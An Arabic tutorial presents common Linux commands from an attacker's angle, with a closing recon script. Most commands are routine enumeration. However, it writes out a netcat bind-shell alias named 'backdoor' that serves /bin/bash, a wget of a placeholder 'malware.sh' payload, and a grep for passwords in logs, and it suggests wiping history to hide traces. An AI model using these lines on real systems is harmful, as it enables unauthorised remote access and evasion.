استخدام سطر أوامر Linux كهاكر: أهم الأوامر للتحكم السريع في النظام


استخدام سطر أوامر Linux كهاكر: أهم الأوامر للتحكم السريع في النظام

في هذا الدرس، سنتعلم كيف نستخدم سطر أوامر Linux بكفاءة عالية للتحكم السريع في الأنظمة، مستكشفين أهم الأوامر التي يستخدمها الهاكرز والمديرون لجمع المعلومات، إدارة الملفات، والتحكم بالعمليات والشبكة.

الخطوة 1: الاستكشاف وجمع المعلومات الأولية

للبدء، يحتاج الهاكر إلى فهم البيئة التي يعمل بها. هذه الأوامر توفر نظرة سريعة على المستخدم، النظام، والشبكة.
whoami         # يعرض اسم المستخدم الحالي الذي قمت بتسجيل الدخول به
id             # يعرض معلومات UID و GID للمستخدم الحالي والمجموعات التي ينتمي إليها
uname -a       # يعرض معلومات مفصلة عن النواة ونظام التشغيل (مثل الإصدار، المعمارية)
ip a           # يعرض عناوين IP لجميع واجهات الشبكة المتاحة
netstat -tuln  # يعرض المنافذ المفتوحة للاستماع (TCP و UDP) على النظام

شرح الأوامر:

تساعدك هذه الأوامر على تحديد هويتك، فهم امتيازاتك، ومعرفة ما إذا كان هناك أي خدمات شبكة تعمل وتستمع على منافذ معينة، مما قد يكشف عن نقاط ضعف محتملة.

الخطوة 2: إدارة الملفات والمجلدات والتصاريح

الوصول إلى الملفات وتعديلها هو جوهر التحكم. هذه الأوامر تسمح لك بالتنقل، البحث، والتلاعب بالملفات والتصاريح.
ls -la /etc/passwd # يعرض محتويات دليل 'etc' بما في ذلك الملفات المخفية وتصاريحها
find / -name "*.conf" 2>/dev/null # يبحث عن جميع الملفات التي تنتهي بـ ".conf" بدءاً من الجذر، مع تجاهل أخطاء الرفض
grep -r "password" /var/log/ # يبحث بشكل متكرر عن كلمة "password" في جميع الملفات داخل دليل /var/log/
chmod +x myscript.sh # يمنح صلاحية التنفيذ لملف السكربت 'myscript.sh'
chown user:group /path/to/file # يغير مالك الملف ومجموعته إلى 'user' و 'group'

شرح الأوامر:

ls -la يكشف عن الملفات المخفية وتفاصيل التصاريح المهمة. find و grep أدوات قوية للبحث عن المعلومات الحساسة. chmod و chown ضروريان لتعديل التصاريح والملكية، وهما غالبًا ما يكونان حاسمين في استغلال الثغرات أو تثبيت الأبواب الخلفية.

الخطوة 3: إدارة العمليات والتحكم بالشبكة

التحكم في العمليات الجارية والتفاعلات الشبكية أمر حيوي للحفاظ على الوصول أو إخفاء الأنشطة.
ps aux | grep root # يعرض جميع العمليات الجارية وينقب عن تلك التي تعمل بصلاحيات 'root'
kill 1234          # ينهي العملية التي تحمل المعرف 1234
top                # يراقب العمليات الجارية واستهلاك الموارد في الوقت الفعلي
wget http://example.com/malware.sh # يقوم بتنزيل ملف من الإنترنت (مثالي لتنزيل أدوات أو حمولات)
curl -X POST -d "data=payload" http://example.com/api # يرسل طلب POST HTTP ببيانات محددة
nc -lvp 4444       # يفتح منفذ للاستماع على المنفذ 4444 (يستخدم لإنشاء اتصالات عكسية أو بوابات خلفية)

شرح الأوامر:

ps aux و top يوفران رؤية للعمليات الجارية، مما يساعد في تحديد العمليات المشبوهة أو تلك التي يمكن استغلالها. kill يمنح القدرة على إيقاف العمليات. wget و curl أدوات أساسية لجلب البيانات أو إرسالها عبر الشبكة، بينما nc (Netcat) هو سكين الجيش السويسري للشبكات، يستخدم غالباً لإنشاء Shells عكسية أو الاستماع للاتصالات.

الخطوة 4: الأتمتة والمهام المتقدمة

لتحقيق الكفاءة، يجب على الهاكر أتمتة المهام واستخدام ميزات سطر الأوامر المتقدمة.
sudo -l           # يعرض الأوامر التي يمكن للمستخدم الحالي تشغيلها بصلاحيات sudo دون الحاجة إلى كلمة مرور
history           # يعرض سجل الأوامر التي تم تنفيذها مسبقاً (مفيد لإعادة بناء التسلسل الزمني أو إخفاء الأثر)
alias backdoor='nc -lvp 1337 -e /bin/bash' # ينشئ اسماً مستعاراً لأمر Netcat لإنشاء باب خلفي مباشر

# مثال لسكربت بسيط لجمع معلومات النظام تلقائياً
#!/bin/bash

echo "Starting quick system recon..."

# جمع معلومات أساسية عن النظام
echo "Hostname: $(hostname)"
echo "OS Info: $(cat /etc/os-release | grep PRETTY_NAME)"
echo "Kernel: $(uname -r)"

# جمع معلومات الشبكة
echo "IP Addresses: $(ip -4 a show | grep inet | awk '{print $2}')"

# البحث عن ملفات قابلة للكتابة في مسارات حساسة (مثال)
echo "Writable files in /opt: $(find /opt -type f -writable 2>/dev/null)"

شرح الأوامر:

sudo -l أمر بالغ الأهمية لتحديد مسارات تصعيد الامتيازات. history يمكن أن يكون كنزاً من المعلومات أو دليلاً يجب محوه. alias يسمح بإنشاء اختصارات للأوامر المعقدة أو المتكررة. السكربت البسيط يوضح كيف يمكن دمج الأوامر لأتمتة مهام جمع المعلومات، مما يوفر الوقت ويقلل من الأخطاء البشرية.

الكود النهائي الكامل (Bash Script)

هذا السكربت يجمع بعض الأوامر المذكورة أعلاه لإنشاء تقرير استكشاف أولي لنظام Linux.
#!/bin/bash
# 
# اسم السكربت: quick_recon.sh
# الوصف: يقوم بجمع معلومات أساسية عن النظام بسرعة.
# 

echo "#########################################"
echo "#          تقرير استكشاف سريع           #"
echo "#########################################"

# معلومات المستخدم والنظام
echo -e "\n### معلومات المستخدم والنظام ###"
echo "المستخدم الحالي: $(whoami)"
echo "UID/GID والمجموعات: $(id)"
echo "إصدار النواة: $(uname -a)"

# معلومات الشبكة
echo -e "\n### معلومات الشبكة ###"
echo "عناوين IP:"
ip a | grep -E 'inet '| awk '{print $2}' # عرض عناوين IP الرئيسية فقط
echo "المنافذ المفتوحة للاستماع (TCP/UDP):"
netstat -tuln

# العمليات الجارية
echo -e "\n### العمليات الجارية (أعلى 5 استهلاكاً للمعالج) ###"
ps aux --sort=-%cpu | head -n 6 # يعرض سطر الرأس + أعلى 5 عمليات

# صلاحيات Sudo
echo -e "\n### صلاحيات Sudo للمستخدم الحالي ###"
sudo -l 2>/dev/null || echo "لا توجد صلاحيات sudo معينة لهذا المستخدم أو لا يمكن التحقق."

# آخر 10 أوامر في السجل
echo -e "\n### آخر 10 أوامر في سجل الأوامر ###"
history | tail -n 10

echo -e "\n#########################################"
echo "#           انتهى التقرير              #"
echo "#########################################"

النتيجة المتوقعة

عند تشغيل هذا السكربت (باستخدام bash quick_recon.sh)، ستحصل على تقرير سريع وموجز يطبع على الشاشة. يتضمن هذا التقرير معلومات حول المستخدم الحالي، تفاصيل نظام التشغيل والنواة، عناوين IP والمنافذ المفتوحة، قائمة بأكثر 5 عمليات استهلاكاً للموارد، صلاحيات sudo المتاحة للمستخدم (إن وجدت)، وآخر 10 أوامر تم تنفيذها في سجل الأوامر الخاص به. هذه المعلومات حيوية للتقييم الأولي لنظام Linux المستهدف، وتوفر نظرة عامة سريعة على حالته الأمنية والتشغيلية.